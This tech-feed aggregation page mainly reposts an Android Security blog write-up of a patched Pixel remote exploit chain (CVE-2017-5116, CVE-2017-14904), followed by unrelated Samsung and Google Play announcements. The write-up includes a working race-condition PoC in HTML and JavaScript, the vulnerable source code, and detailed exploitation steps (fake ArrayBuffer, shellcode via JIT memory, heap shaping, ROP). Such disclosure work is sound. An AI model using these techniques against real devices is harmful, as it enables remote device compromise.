Reader@mReotEch.com

Latest Tech Feeds to Keep You Updated…

Android Security Ecosystem Investments Pay Dividends for Pixel

Posted by Mayank Jain and Scott Roberts of the Android Security team

In June 2017, the Android security team increased the top payouts for the Android Security Rewards (ASR) program and worked with researchers to streamline the exploit submission process. In August 2017, Guang Gong (@oldfresher) of Alpha Team, Qihoo 360 Technology Co. Ltd. submitted the first working remote exploit chain since the ASR program's expansion. For his detailed report, Gong was awarded $105,000, which is the highest reward in the history of the ASR program and $7500 by Chrome Rewards program for a total of $112,500. The complete set of issues was resolved as part of the December 2017 monthly security update. Devices with the security patch level of 2017-12-05 or later are protected from these issues.

All Pixel devices or partner devices using A/B (seamless) system updates will automatically install these updates; users must restart their devices to complete the installation.

The Android Security team would like to thank Guang Gong and the researcher community for their contributions to Android security. If you'd like to participate in Android Security Rewards program, check out our Program rules. For tips on how to submit reports, see Bug Hunter University.

The following article is a guest blog post authored by Guang Gong of Alpha team, Qihoo 360 Technology Ltd.

Technical details of a Pixel remote exploit chain

The Pixel phone is protected by many layers of security. It was the only device that was not pwned in the 2017 Mobile Pwn2Own competition. But in August 2017, my team discovered a remote exploit chain—the first of its kind since the ASR program expansion. Thanks to the Android security team for their responsiveness and help during the submission process.

This blog post covers the technical details of the exploit chain. The exploit chain includes two bugs, CVE-2017-5116 and CVE-2017-14904. CVE-2017-5116 is a V8 engine bug that is used to get remote code execution in sandboxed Chrome render process. CVE-2017-14904 is a bug in Android's libgralloc module that is used to escape from Chrome's sandbox. Together, this exploit chain can be used to inject arbitrary code into system_server by accessing a malicious URL in Chrome. To reproduce the exploit, an example vulnerable environment is Chrome 60.3112.107 + Android 7.1.2 (Security patch level 2017-8-05) (google/sailfish/sailfish:7.1.2/NJH47F/4146041:user/release-keys). 

The RCE bug (CVE-2017-5116)

New features usually bring new bugs. V8 6.0 introduces support for SharedArrayBuffer, a low-level mechanism to share memory between JavaScript workers and synchronize control flow across workers. SharedArrayBuffers give JavaScript access to shared memory, atomics, and futexes. WebAssembly is a new type of code that can be run in modern web browsers— it is a low-level assembly-like language with a compact binary format that runs with near-native performance and provides languages, such as C/C++, with a compilation target so that they can run on the web. By combining the three features, SharedArrayBuffer WebAssembly, and web worker in Chrome, an OOB access can be triggered through a race condition. Simply speaking, WebAssembly code can be put into a SharedArrayBuffer and then transferred to a web worker. When the main thread parses the WebAssembly code, the worker thread can modify the code at the same time, which causes an OOB access.

The buggy code is in the function GetFirstArgumentAsBytes where the argument args may be an ArrayBuffer or TypedArray object. After SharedArrayBuffer is imported to JavaScript, a TypedArray may be backed by a SharedArraybuffer, so the content of the TypedArray may be modified by other worker threads at any time.

i::wasm::ModuleWireBytes GetFirstArgumentAsBytes(
    const v8::FunctionCallbackInfo<v8::Value>& args, ErrorThrower* thrower) {
  ......
  } else if (source->IsTypedArray()) {    //--->source should be checked if it's backed by a SharedArrayBuffer
    // A TypedArray was passed.
    Local<TypedArray> array = Local<TypedArray>::Cast(source);
    Local<ArrayBuffer> buffer = array->Buffer();
    ArrayBuffer::Contents contents = buffer->GetContents();
    start =
        reinterpret_cast<const byte*>(contents.Data()) + array->ByteOffset();
    length = array->ByteLength();
  } 
  ......
  return i::wasm::ModuleWireBytes(start, start + length);
}

A simple PoC is as follows:

<html>
<h1>poc</h1>
<script id="worker1">
worker:{
       self.onmessage = function(arg) {
        console.log("worker started");
        var ta = new Uint8Array(arg.data);
        var i =0;
        while(1){
            if(i==0){
                i=1;
                ta[51]=0;   //--->4)modify the webassembly code at the same time
            }else{
                i=0;
                ta[51]=128;
            }
        }
    }
}
</script>
<script>
function getSharedTypedArray(){
    var wasmarr = [
        0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00,
        0x01, 0x05, 0x01, 0x60, 0x00, 0x01, 0x7f, 0x03,
        0x03, 0x02, 0x00, 0x00, 0x07, 0x12, 0x01, 0x0e,
        0x67, 0x65, 0x74, 0x41, 0x6e, 0x73, 0x77, 0x65,
        0x72, 0x50, 0x6c, 0x75, 0x73, 0x31, 0x00, 0x01,
        0x0a, 0x0e, 0x02, 0x04, 0x00, 0x41, 0x2a, 0x0b,
        0x07, 0x00, 0x10, 0x00, 0x41, 0x01, 0x6a, 0x0b];
    var sb = new SharedArrayBuffer(wasmarr.length);           //---> 1)put WebAssembly code in a SharedArrayBuffer
    var sta = new Uint8Array(sb);
    for(var i=0;i<sta.length;i++)
        sta[i]=wasmarr[i];
    return sta;    
}
var blob = new Blob([
        document.querySelector('#worker1').textContent
        ], { type: "text/javascript" })

var worker = new Worker(window.URL.createObjectURL(blob));   //---> 2)create a web worker
var sta = getSharedTypedArray();
worker.postMessage(sta.buffer);                              //--->3)pass the WebAssembly code to the web worker
setTimeout(function(){
        while(1){
        try{
        sta[51]=0;
        var myModule = new WebAssembly.Module(sta);          //--->4)parse the WebAssembly code
        var myInstance = new WebAssembly.Instance(myModule);
        //myInstance.exports.getAnswerPlus1();
        }catch(e){
        }
        }
    },1000);

//worker.terminate(); 
</script>
</html>

The text format of the WebAssembly code is as follows:

00002b func[0]:
00002d: 41 2a                      | i32.const 42
00002f: 0b                         | end
000030 func[1]:
000032: 10 00                      | call 0
000034: 41 01                      | i32.const 1
000036: 6a                         | i32.add
000037: 0b                         | end

First, the above binary format WebAssembly code is put into a SharedArrayBuffer, then a TypedArray Object is created, using the SharedArrayBuffer as buffer. After that, a worker thread is created and the SharedArrayBuffer is passed to the newly created worker thread. While the main thread is parsing the WebAssembly Code, the worker thread modifies the SharedArrayBuffer at the same time. Under this circumstance, a race condition causes a TOCTOU issue. After the main thread's bound check, the instruction " call 0" can be modified by the worker thread to "call 128" and then be parsed and compiled by the main thread, so an OOB access occurs.

Because the "call 0" Web Assembly instruction can be modified to call any other Web Assembly functions, the exploitation of this bug is straightforward. If "call 0" is modified to "call $leak", registers and stack contents are dumped to Web Assembly memory. Because function 0 and function $leak have a different number of arguments, this results in many useful pieces of data in the stack being leaked.

 (func $leak(param i32 i32 i32 i32 i32 i32)(result i32)
    i32.const 0
    get_local 0
    i32.store
    i32.const 4
    get_local 1
    i32.store
    i32.const 8
    get_local 2
    i32.store
    i32.const 12
    get_local 3
    i32.store
    i32.const 16
    get_local 4
    i32.store
    i32.const 20
    get_local 5
    i32.store
    i32.const 0
  ))

Not only the instruction "call 0" can be modified, any "call funcx" instruction can be modified. Assume funcx is a wasm function with 6 arguments as follows, when v8 compiles funcx in ia32 architecture, the first 5 arguments are passed through the registers and the sixth argument is passed through stack. All the arguments can be set to any value by JavaScript:

/*Text format of funcx*/
 (func $simple6 (param i32 i32 i32 i32 i32 i32 ) (result i32)
    get_local 5
    get_local 4
    i32.add)

/*Disassembly code of funcx*/
--- Code ---
kind = WASM_FUNCTION
name = wasm#1
compiler = turbofan
Instructions (size = 20)
0x58f87600     0  8b442404       mov eax,[esp+0x4]
0x58f87604     4  03c6           add eax,esi
0x58f87606     6  c20400         ret 0x4
0x58f87609     9  0f1f00         nop

Safepoints (size = 8)

RelocInfo (size = 0)

--- End code ---

When a JavaScript function calls a WebAssembly function, v8 compiler creates a JS_TO_WASM function internally, after compilation, the JavaScript function will call the created JS_TO_WASM function and then the created JS_TO_WASM function will call the WebAssembly function. JS_TO_WASM functions use different call convention, its first arguments is passed through stack. If "call funcx" is modified to call the following JS_TO_WASM function.

/*Disassembly code of JS_TO_WASM function */
--- Code ---
kind = JS_TO_WASM_FUNCTION
name = js-to-wasm#0
compiler = turbofan
Instructions (size = 170)
0x4be08f20     0  55             push ebp
0x4be08f21     1  89e5           mov ebp,esp
0x4be08f23     3  56             push esi
0x4be08f24     4  57             push edi
0x4be08f25     5  83ec08         sub esp,0x8
0x4be08f28     8  8b4508         mov eax,[ebp+0x8]
0x4be08f2b     b  e8702e2bde     call 0x2a0bbda0  (ToNumber)    ;; code: BUILTIN
0x4be08f30    10  a801           test al,0x1
0x4be08f32    12  0f852a000000   jnz 0x4be08f62  <+0x42>

The JS_TO_WASM function will take the sixth arguments of funcx as its first argument, but it takes its first argument as an object pointer, so type confusion will be triggered when the argument is passed to the ToNumber function, which means we can pass any values as an object pointer to the ToNumber function. So we can fake an ArrayBuffer object in some address such as in a double array and pass the address to ToNumber. The layout of an ArrayBuffer is as follows:

/* ArrayBuffer layouts 40 Bytes*/                                                                                                                         
Map                                                                                                                                                       
Properties                                                                                                                                                
Elements                                                                                                                                                  
ByteLength                                                                                                                                                
BackingStore                                                                                                                                              
AllocationBase                                                                                                                                            
AllocationLength                                                                                                                                          
Fields                                                                                                                                                    
internal                                                                                                                                                  
internal                                                                                                                                                                                                                                                                                                      


/* Map layouts 44 Bytes*/                                                                                                                                   
static kMapOffset = 0,                                                                                                                                    
static kInstanceSizesOffset = 4,                                                                                                                          
static kInstanceAttributesOffset = 8,                                                                                                                     
static kBitField3Offset = 12,                                                                                                                             
static kPrototypeOffset = 16,                                                                                                                             
static kConstructorOrBackPointerOffset = 20,                                                                                                              
static kTransitionsOrPrototypeInfoOffset = 24,                                                                                                            
static kDescriptorsOffset = 28,                                                                                                                           
static kLayoutDescriptorOffset = 1,                                                                                                                       
static kCodeCacheOffset = 32,                                                                                                                             
static kDependentCodeOffset = 36,                                                                                                                         
static kWeakCellCacheOffset = 40,                                                                                                                         
static kPointerFieldsBeginOffset = 16,                                                                                                                    
static kPointerFieldsEndOffset = 44,                                                                                                                      
static kInstanceSizeOffset = 4,                                                                                                                           
static kInObjectPropertiesOrConstructorFunctionIndexOffset = 5,                                                                                           
static kUnusedOffset = 6,                                                                                                                                 
static kVisitorIdOffset = 7,                                                                                                                              
static kInstanceTypeOffset = 8,     //one byte                                                                                                            
static kBitFieldOffset = 9,                                                                                                                               
static kInstanceTypeAndBitFieldOffset = 8,                                                                                                                
static kBitField2Offset = 10,                                                                                                                             
static kUnusedPropertyFieldsOffset = 11

Because the content of the stack can be leaked, we can get many useful data to fake the ArrayBuffer. For example, we can leak the start address of an object, and calculate the start address of its elements, which is a FixedArray object. We can use this FixedArray object as the faked ArrayBuffer's properties and elements fields. We have to fake the map of the ArrayBuffer too, luckily, most of the fields of the map are not used when the bug is triggered. But the InstanceType in offset 8 has to be set to 0xc3(this value depends on the version of v8) to indicate this object is an ArrayBuffer. In order to get a reference of the faked ArrayBuffer in JavaScript, we have to set the Prototype field of Map in offset 16 to an object whose Symbol.toPrimitive property is a JavaScript call back function. When the faked array buffer is passed to the ToNumber function, to convert the ArrayBuffer object to a Number, the call back function will be called, so we can get a reference of the faked ArrayBuffer in the call back function. Because the ArrayBuffer is faked in a double array, the content of the array can be set to any value, so we can change the field BackingStore and ByteLength of the faked array buffer to get arbitrary memory read and write. With arbitrary memory read/write, executing shellcode is simple. As JIT Code in Chrome is readable, writable and executable, we can overwrite it to execute shellcode.

Chrome team fixed this bug very quickly in chrome 61.0.3163.79, just a week after I submitted the exploit.

The EoP Bug (CVE-2017-14904)

The sandbox escape bug is caused by map and unmap mismatch, which causes a Use-After-Unmap issue. The buggy code is in the functions gralloc_map and gralloc_unmap:

static int gralloc_map(gralloc_module_t const* module,
                       buffer_handle_t handle)
{ ……
    private_handle_t* hnd = (private_handle_t*)handle;
    ……
    if (!(hnd->flags & private_handle_t::PRIV_FLAGS_FRAMEBUFFER) &&
        !(hnd->flags & private_handle_t::PRIV_FLAGS_SECURE_BUFFER)) {
        size = hnd->size;
        err = memalloc->map_buffer(&mappedAddress, size,
                                       hnd->offset, hnd->fd);        //---> mapped an ashmem and get the mapped address. the ashmem fd and offset can be controlled by Chrome render process.
        if(err || mappedAddress == MAP_FAILED) {
            ALOGE("Could not mmap handle %p, fd=%d (%s)",
                  handle, hnd->fd, strerror(errno));
            return -errno;
        }
        hnd->base = uint64_t(mappedAddress) + hnd->offset;          //---> save mappedAddress+offset to hnd->base
    } else {
        err = -EACCES;
}
……
    return err;
}

gralloc_map maps a graphic buffer controlled by the arguments handle to memory space and gralloc_unmap unmaps it. While mapping, the mappedAddress plus hnd->offset is stored to hnd->base, but while unmapping, hnd->base is passed to system call unmap directly minus the offset. hnd->offset can be manipulated from a Chrome's sandboxed process, so it's possible to unmap any pages in system_server from Chrome's sandboxed render process.

static int gralloc_unmap(gralloc_module_t const* module,
                         buffer_handle_t handle)
{
  ……
    if(hnd->base) {
        err = memalloc->unmap_buffer((void*)hnd->base, hnd->size, hnd->offset);    //---> while unmapping, hnd->offset is not used, hnd->base is used as the base address, map and unmap are mismatched.
        if (err) {
            ALOGE("Could not unmap memory at address %p, %s", (void*) hnd->base,
                    strerror(errno));
            return -errno;
        }
        hnd->base = 0;
}
……
    return 0;
}

int IonAlloc::unmap_buffer(void *base, unsigned int size,
        unsigned int /*offset*/)                              
//---> look, offset is not used by unmap_buffer
{
    int err = 0;
    if(munmap(base, size)) {
        err = -errno;
        ALOGE("ion: Failed to unmap memory at %p : %s",
              base, strerror(errno));
    }
    return err;
}

Although SeLinux restricts the domain isolated_app to access most of Android system service, isolated_app can still access three Android system services.

52neverallow isolated_app {
53    service_manager_type
54    -activity_service
55    -display_service
56    -webviewupdate_service
57}:service_manager find;

To trigger the aforementioned Use-After-Unmap bug from Chrome's sandbox, first put a GraphicBuffer object, which is parseable into a bundle, and then call the binder method convertToTranslucent of IActivityManager to pass the malicious bundle to system_server. When system_server handles this malicious bundle, the bug is triggered.

This EoP bug targets the same attack surface as the bug in our 2016 MoSec presentation, A Way of Breaking Chrome's Sandbox in Android. It is also similar to Bitunmap, except exploiting it from a sandboxed Chrome render process is more difficult than from an app. 

To exploit this EoP bug:

1. Address space shaping. Make the address space layout look as follows, a heap chunk is right above some continuous ashmem mapping:

7f54600000-7f54800000 rw-p 00000000 00:00 0           [anon:libc_malloc]
7f58000000-7f54a00000 rw-s 001fe000 00:04 32783         /dev/ashmem/360alpha29 (deleted)
7f54a00000-7f54c00000 rw-s 00000000 00:04 32781         /dev/ashmem/360alpha28 (deleted)
7f54c00000-7f54e00000 rw-s 00000000 00:04 32779         /dev/ashmem/360alpha27 (deleted)
7f54e00000-7f55000000 rw-s 00000000 00:04 32777         /dev/ashmem/360alpha26 (deleted)
7f55000000-7f55200000 rw-s 00000000 00:04 32775         /dev/ashmem/360alpha25 (deleted)
......

2. Unmap part of the heap (1 KB) and part of an ashmem memory (2MB–1KB) by triggering the bug:

7f54400000-7f54600000 rw-s 00000000 00:04 31603         /dev/ashmem/360alpha1000 (deleted)
7f54600000-7f547ff000 rw-p 00000000 00:00 0           [anon:libc_malloc]
//--->There is a 2MB memory gap
7f549ff000-7f54a00000 rw-s 001fe000 00:04 32783        /dev/ashmem/360alpha29 (deleted)
7f54a00000-7f54c00000 rw-s 00000000 00:04 32781        /dev/ashmem/360alpha28 (deleted)
7f54c00000-7f54e00000 rw-s 00000000 00:04 32779        /dev/ashmem/360alpha27 (deleted)
7f54e00000-7f55000000 rw-s 00000000 00:04 32777        /dev/ashmem/360alpha26 (deleted)
7f55000000-7f55200000 rw-s 00000000 00:04 32775        /dev/ashmem/360alpha25 (deleted)

3. Fill the unmapped space with an ashmem memory:

7f54400000-7f54600000 rw-s 00000000 00:04 31603      /dev/ashmem/360alpha1000 (deleted)
7f54600000-7f547ff000 rw-p 00000000 00:00 0         [anon:libc_malloc]
7f547ff000-7f549ff000 rw-s 00000000 00:04 31605       /dev/ashmem/360alpha1001 (deleted)  
//--->The gap is filled with the ashmem memory 360alpha1001
7f549ff000-7f54a00000 rw-s 001fe000 00:04 32783      /dev/ashmem/360alpha29 (deleted)
7f54a00000-7f54c00000 rw-s 00000000 00:04 32781      /dev/ashmem/360alpha28 (deleted)
7f54c00000-7f54e00000 rw-s 00000000 00:04 32779      /dev/ashmem/360alpha27 (deleted)
7f54e00000-7f55000000 rw-s 00000000 00:04 32777      /dev/ashmem/360alpha26 (deleted)
7f55000000-7f55200000 rw-s 00000000 00:04 32775      /dev/ashmem/360alpha25 (deleted)

4. Spray the heap and the heap data will be written to the ashmem memory:

7f54400000-7f54600000 rw-s 00000000 00:04 31603        /dev/ashmem/360alpha1000 (deleted)
7f54600000-7f547ff000 rw-p 00000000 00:00 0           [anon:libc_malloc]
7f547ff000-7f549ff000 rw-s 00000000 00:04 31605          /dev/ashmem/360alpha1001 (deleted)
//--->the heap manager believes the memory range from 0x7f547ff000 to 0x7f54800000 is still mongered by it and will allocate memory from this range, result in heap data is written to ashmem memory
7f549ff000-7f54a00000 rw-s 001fe000 00:04 32783        /dev/ashmem/360alpha29 (deleted)
7f54a00000-7f54c00000 rw-s 00000000 00:04 32781        /dev/ashmem/360alpha28 (deleted)
7f54c00000-7f54e00000 rw-s 00000000 00:04 32779        /dev/ashmem/360alpha27 (deleted)
7f54e00000-7f55000000 rw-s 00000000 00:04 32777        /dev/ashmem/360alpha26 (deleted)
7f55000000-7f55200000 rw-s 00000000 00:04 32775        /dev/ashmem/360alpha25 (deleted)

5. Because the filled ashmem in step 3 is mapped both by system_server and render process, part of the heap of system_server can be read and written by render process and we can trigger system_server to allocate some GraphicBuffer object in ashmem. As GraphicBuffer is inherited from ANativeWindowBuffer, which has a member named common whose type is android_native_base_t, we can read two function points (incRef and decRef) from ashmem memory and then can calculate the base address of the module libui. In the latest Pixel device, Chrome's render process is still 32-bit process but system_server is 64-bit process. So we have to leak some module's base address for ROP. Now that we have the base address of libui, the last step is to trigger ROP. Unluckily, it seems that the points incRef and decRef haven't been used. It's impossible to modify it to jump to ROP, but we can modify the virtual table of GraphicBuffer to trigger ROP.

typedef struct android_native_base_t
{
    /* a magic value defined by the actual EGL native type */
    int magic;

    /* the sizeof() of the actual EGL native type */
    int version;

    void* reserved[4];

    /* reference-counting interface */
    void (*incRef)(struct android_native_base_t* base);
    void (*decRef)(struct android_native_base_t* base);
} android_native_base_t;

6.Trigger a GC to execute ROP

When a GraphicBuffer object is deconstructed, the virtual function onLastStrongRef is called, so we can replace this virtual function to jump to ROP. When GC happens, the control flow goes to ROP. Finding an ROP chain in limited module(libui) is challenging, but after hard work, we successfully found one and dumped the contents of the file into /data/misc/wifi/wpa_supplicant.conf .

Summary

The Android security team responded quickly to our report and included the fix for these two bugs in the December 2017 Security Update. Supported Google device and devices with the security patch level of 2017-12-05 or later address these issues. While parsing untrusted parcels still happens in sensitive locations, the Android security team is working on hardening the platform to mitigate against similar vulnerabilities.

The EoP bug was discovered thanks to a joint effort between 360 Alpha Team and 360 C0RE Team. Thanks very much for their effort.

Samsung Electronics Unveils PyeongChang 2018 Olympic Games Limited Edition to Celebrate the Spirit of the Olympic Winter Games PyeongChang 2018

 

With less than a month to-go until the Olympic Winter Games PyeongChang 2018, Samsung Electronics, Worldwide Olympic Partner in the Wireless Communications Equipment and Computing Equipment category, today unveiled the PyeongChang 2018 Olympic Games Limited Edition. To further extend its Olympic legacy of supporting athletes and the Olympic family, Samsung will provide the exclusive devices, which are a special edition of the Galaxy Note8, as encouragement to do bigger things at the Olympic Winter Games, while also helping maintain real-time connections and capturing and sharing memories with those near and far.

 

In collaboration with the International Olympic Committee (IOC) and the PyeongChang Organizing Committee for the 2018 Olympic & Paralympic Winter Games (POCOG), Samsung will deliver over 4,000 devices to all Olympians as well as the PyeongChang 2018 Olympic family allowing them to lean on Samsung mobile technology to enhance their experiences and connect more conveniently. The PyeongChang 2018 Olympic Games Limited Edition will include the bold new features of the Galaxy Note8, such as the innovative bezel-less 6.3-inch Infinity Display that fits comfortably in one hand, enhanced S Pen for efficient productivity, and Samsung’s best-in-class Dual Camera. Exclusively for the Games, the PyeongChang 2018 Olympic Games Limited Edition will showcase a shiny white back glass to celebrate the winter theme, and gold Olympic rings – inspired by the Olympic Torch – an expression of the Olympic Movement with the union of five continents, and unity worldwide.

 

“Throughout our 20-year legacy as an Olympic partner, Samsung has showcased our support of the Olympic Movement by helping spread the Olympic Spirit and enhance connections through our latest technological innovations and immersive experiences,” said Younghee Lee, CMO and Executive Vice President, Samsung Electronics. “We’re proud to provide the PyeongChang 2018 Olympic Games Limited Edition to all athletes in an effort to help them to stay connected, capture and share one of the most memorable moments of their lives.”

 

The PyeongChang 2018 Olympic Games Limited Edition will feature celebratory pre-loaded PyeongChang 2018 themed wallpapers, allowing recipients to stay connected in-style through Samsung’s most advanced mobile technology. As an added element, useful apps will be pre-installed to help cultivate the utmost Olympic Games experience.

 

“Samsung’s commitment to the Olympic Movement has increasingly enabled meaningful connections through innovative mobile technologies over the past 20 years,” said IOC President Thomas Bach. “Samsung’s creation of an Olympic Games Limited Edition device reinforces Samsung and IOC’s shared desire to spread the Olympic spirit. It’s because of dedicated partners like Samsung that we’re in the position to provide unforgettable experiences at the Olympic Games time after time.”

 

 

Samsung to Provide Galaxy Note8 to Paralympians

Displaying commitment to the Paralympic Movement, Samsung will provide smartphones to all Paralympians at the Paralympic Winter Games PyeongChang 2018. Each Paralympian will receive the Galaxy Note8 along with cases that feature the Paralympic Games logo and be exposed to how breakthrough mobile technologies can help make the digital world more accessible for those with disabilities. Samsung has been a World Paralympic Partner since the Olympic Winter Games Vancouver 2010 and an advocate for the Paralympic Movement striving to inspire the spirit of progress and the human challenge ever since.

 

About Samsung’s Involvement in the Olympic Games

Samsung began its Olympic Games involvement as a local sponsor of Olympic Games Seoul 1988. Beginning with Olympic Winter Games Nagano 1998, the company extended its commitment to the Olympic Movement as the Worldwide Olympic Partner in the Wireless Communications Equipment category, providing its proprietary wireless communications platform and mobile devices. These innovative mobile technologies provide the Olympic Community, athletes and fans around the world with interactive communications and information services, and Samsung Pay. Samsung hosts various Olympic campaigns to share the excitement of the Olympic Games with people around the world and enable everyone to participate in the Games through its innovative mobile technology. Samsung’s commitment as a Worldwide Olympic Partner continues through PyeongChang 2018, and Tokyo 2020 in the Wireless Communications Equipment and Computing Equipment category.

Meet the finalists of the Google Play Indie Games Contest in Europe

Posted by Adriana Puchianu, Developer Marketing Google Play

Back in October we launched the 2nd edition of the Google Play Indie Games Contest in Europe, with the aim to identify, showcase and reward indie gaming talent from more than 30 countries. We were amazed by the innovation and creativity that indie developers from the region have to offer.

Selecting just 20 finalists has once again been a huge challenge. We had a lot of fun playing the games that will go on to showcase at the Saatchi Gallery on February 13th in London. Without further ado, we are happy to announce the Top 20 finalists of this year's edition. Congratulations to the finalists and thanks to everyone else who has entered the contest.

A Planet of Mine
Tuesday Quest
France

Bridge Constructor Portal
ClockStone Softwareentwicklung GmbH
Austria

Bury me, my Love
Playdius
France

Captain Tom Galactic Traveler
Picodongames
France

Core
FURYJAM
Russia

Flat Pack
Nitrome
United Kingdom

Fern Flower
Macaque
Poland

I Love Hue
Zut!
United Kingdom

Jodeo
Gamebra.in
Turkey

Kami 2
State of Play
United Kingdom

Kenshō
FIFTYTWO
Russia

No More Buttons
Tommy Søreide Kjær
Norway

Old Man's Journey
Broken Rules Interactive Media GmbH
Austria

Radium 2 | Ra²
Developster
Germany

The Big Journey
Catfishbox
Ukraine

The House of Da Vinci
Blue Brain Games, s.r.o.
Slovakia

The Office Quest
11Sheep
Israel

Unbalance
TVEE
Turkey

Undervault
Andriy Bychkovskyi
Ukraine

yellow
Bart Bonte
Belgium

Check out the prizes

All the 20 finalists are getting:

  • A paid trip to London to showcase their game at the Final held at Saatchi Gallery
  • Inclusion of their game on a promotional billboard in London for 1 month
  • Inclusion of their game in a dedicated Indie Games Contest collection on the Indie Corner for one month in more than 40 countries across EMEA
  • Two (2) tickets to attend a 2018 Playtime event, an invitation-only event for top apps and games developers on Google Play
  • One (1) Pixel 2 device

They will also have the chance to win more prizes at the final event.

Join the Google Play team and the finalists at the final event:

Anyone can now register to attend the final showcase event for free at the Saatchi Gallery in London on 13 February 2018. Come and play some great games and have fun with indie developers, industry experts, and the Google Play team.

How useful did you find this blogpost?

Statement on French NGO’s allegations

Samsung deeply values the global network of employees at all of our manufacturing facilities who make it possible for us to deliver our products to our customers worldwide.

 

According to publicly available information, the new proceeding is based on the same allegations used in two previous proceedings initiated by Sherpa in 2013 and 2016, which were both closed in favor of Samsung.

 

We believe it is our responsibility to hold ourselves and our suppliers to the highest standards of labor practices while strictly complying with local labor regulations and international labor standards.

 

Samsung upholds a zero tolerance policy with regard to child labor, both in our own facilities and those of our suppliers.

Faster Renewals for Test Subscriptions

Testing your in-app subscriptions is a critical step in ensuring you're offering your customers a high quality service.

In order to make testing easier and faster, starting on February 20th, we are introducing shorter renewal intervals for test purchases made with license-test accounts. Currently, subscriptions by license-test accounts renew daily. The new changes will allow you to test an entire subscription cycle, including 6 renewals, in under an hour. We will also be shortening the testing time intervals of features such as grace period and account hold.

Please be aware that these changes are coming so you can update your testing flows accordingly prior to the change. Also note that existing test subscriptions still active on February 20, 2018 will automatically be canceled at that time.

Renewal times

Renewal times will vary based on the subscription period:

Subscription period Test subscription period
1 week 5 minutes
1 month 5 minutes
3 month 10 minutes
6 month 15 minutes
1 year 30 minutes

Time intervals of the following features will also be shortened for test subscriptions:

Feature Test period
Free trial 3 minutes
Introductory price period Same as test subscription period
Grace period (both 3 and 7 day) 5 minutes
Account hold 10 minutes

Note: These times are approximate; you may see some small variations in the precise time of an event. To compensate for variation, call the Google Play Developer API to view current status after every subscription expiration date.

Renewal limit

Due to the increase in renewal frequency, the number of renewals is limited to 6 regular renewals (not including intro price/free trial). After 6 renewals, the subscription will be automatically canceled.

Examples

Here are several examples of how the new renewal times are applied.

Free trial

Grace period

Account hold

Don't forget to check the Testing In-app Billing page for more details on testing your subscriptions. If you still have questions, reach out through the comments or post your question on Stackoverflow using the tag google-play.

Samsung Wins Best of KBIS 2018 Awards Across Two Categories

 

Samsung Electronics today announced that it has won two KBIS 2018 awards, the new and first year category award for Smart Home Technology and Best of Kitchen Silver award, presented by the Kitchen and Bath Industry Show (KBIS).

 

The kitchen and bath industry’s premier awards program highlights the best new kitchen and bath products that push the boundaries of design, technology and innovation. Winners are selected based on innovation, design and function.

 

The Samsung Front Load Washer with QuickDrive™ is a major step forward in laundry innovation and cuts washing time.  Equipped with faster wash time and enhanced smart capabilities, the new washer with QuickDrive™ technology and intelligent Q-rator laundry assistant takes the guesswork out of doing laundry from your mobile device. It has smart capabilities that simplify the washing cycle with intuitive features that provide automatic recommendations for optimal wash cycles, manage the time that a wash cycle will finish and adjust cycle settings, and monitors the washer to keep it operating at optimal performance.

 

The Samsung FlexWash™ + FlexDry™ are a versatile new laundry pair that provide ultimate flexibility to wash and dry multiple loads of laundry at the same time.  FlexWash™ + FlexDry™ provide an unprecedented amount of flexibility to let you do multiple cycles at the same time, so you can keep a wide variety of clothes in great condition.

 

This year, KBIS added new categories to recognize and honor brands at the forefront of smart home innovations which are driving the kitchen and bath innovations of tomorrow. A total of six awards were given out including Kitchen Gold and Silver, Bath Gold and Silver, Best in Show and the new Smart Home Technology award.

 

“We are proud to be the recipient of two KBIS awards this year, as it underscores Samsung’s dedication and commitment to bringing meaningful innovation to the home appliance industry and to consumers,” said Tom Halford, Vice President of Samsung Premium and Builder Brands. “Our combination of technology, performance and design is resonating strongly, and we are looking forward to a game-changing 2018.”

 

Following KBIS 2018, voting for the Best of KBIS People’s Choice award will take place online, via the KBIS Facebook page. Voting opens January 12, 2018, and show attendees can cast their vote for their favorite products. There will be three People’s Choice Winners (First, Second and Third Place).

 

Android Excellence: Congratulations to the newly added apps and games

Posted by Kacey Fahey, Developer Marketing, Google Play

Kicking off the new year, we're excited to welcome our latest group of Android Excellence apps and games. These awardees represent some of the best experiences and top performing apps and games on the Play Store and can be found with other great selections on the Editors' Choice page.

If you're looking for some new apps, below are a few highlights.

  • EyeEm: A great photo editor app with a full suite of filters and tools to make your pictures shine. Learn style tips from their community and even sell your images through the EyeEm marketplace.
  • Musixmatch: Check out Musixmatch's updated app while learning the lyrics to all your favorite songs. The app is compatible with many of the top music streaming services and you can even follow along with your Android Wear device or on the big screen with Chromecast support.
  • ViewRanger: Plan your next hiking adventure by discovering new routes and trail guides with ViewRanger. Check out the Skyline feature using your phone's camera to identify over 9 million sites across the world through augmented reality.

Here are a few of our favorite new games joining the collection.

  • Fire Emblem Heroes: Nintendo's popular strategy-RPG franchise is now reimagined for mobile. Fight battles, develop your heroes' skills, and try various gameplay modes for hours of exciting gameplay.
  • Lumino City: Explore the charming papercraft style world in this award-winning puzzle adventure game. The beautiful scenery is all handcrafted.
  • Old Man's Journey: Gorgeous scenery, an immersive soundtrack, and deep emotion help you uncover the old man's life stories while you solve puzzles and shape the landscape to determine his future.

Congratulations to the newly added Android Excellence apps and games.

New Android Excellence apps New Android Excellence games
1tap

Acorns

Airbnb

Blink Health

Blinkist

Clue

Ditty

EyeEm

Fabulous

IFTTT

iReader

Journey

KKBOX

LinkedIn

Mobills: Budget Planner

Musixmatch

Shpock

Stocard

Video Editor

ViewRanger

YAZIO

YOP

Agent A

Bit Heroes

Bloons Supermonkey 2

Dancing Line

DEAD WARFARE: Zombie

Dragon Project

Fire Emblem Heroes

Futurama: Worlds of Tomorrow

Idle Heroes

Last Day on Earth: Survival

Lords Mobile

Lumino City

Modern Combat Versus

Old Man's Journey

The Walking Dead No Man's Land

War Wings

Explore other great apps and games in the Editors' Choice section on Google Play and discover best practices to help you build quality apps and games for people to love.

How useful did you find this blogpost?

New Products At CES powered by Android Things

By Venkat Rapaka, Director of Product Management, Google

The Android Things team has been working closely with our partners to create compelling, secure and thoughtful IoT products. During the Consumer Electronics Show (CES) in Las Vegas, a number of our OEM partners are announcing their first set of products powered by Android Things. These products are built on certified Android Things System-on-Modules (SoMs) from our silicon partners, benefit from regular feature and security updates from Google, and have the Google Assistant and Google Cast seamlessly built in.

